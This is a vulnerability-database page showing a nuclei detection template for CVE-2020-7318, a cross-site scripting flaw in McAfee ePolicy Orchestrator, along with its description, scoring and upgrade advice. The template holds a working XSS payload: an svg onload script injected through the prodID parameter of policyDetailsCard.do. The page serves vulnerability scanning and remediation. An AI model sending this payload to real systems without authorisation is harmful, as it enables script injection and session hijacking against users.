Lucene search
K

McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

McAfee ePolicy Orchestrator <5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows injection of arbitrary web script or HTML via unsanitized administrator entries. Upgrade to version 5.10.9 Update 9 or later to mitigate this risk

Related
Refs
Code
id: CVE-2020-7318

info:
  name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
  author: dwisiswant0
  severity: medium
  description: |
    McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
    reference:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7318
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.
  reference:
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2020-7318
    cwe-id: CWE-79
    epss-score: 0.01024
    epss-percentile: 0.59349
    cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mcafee
    product: epolicy_orchestrator
  tags: cve,cve2020,xss,mcafee,vuln

http:
  - raw:
      - |
        GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "Policy Name"
          - "'\"><svg/onload=alert(document.domain)>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200df1eb0abdc6edce295188f0239b7780e9f198bff385a858fdf5040da46b6f14022100e7ad14e35174f27ad81551b51e9e419cc489ec665a6c0721f5b2b1c0a27c7cfc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 22.3
CVSS 3.14.3 - 4.6
EPSS0.01024
34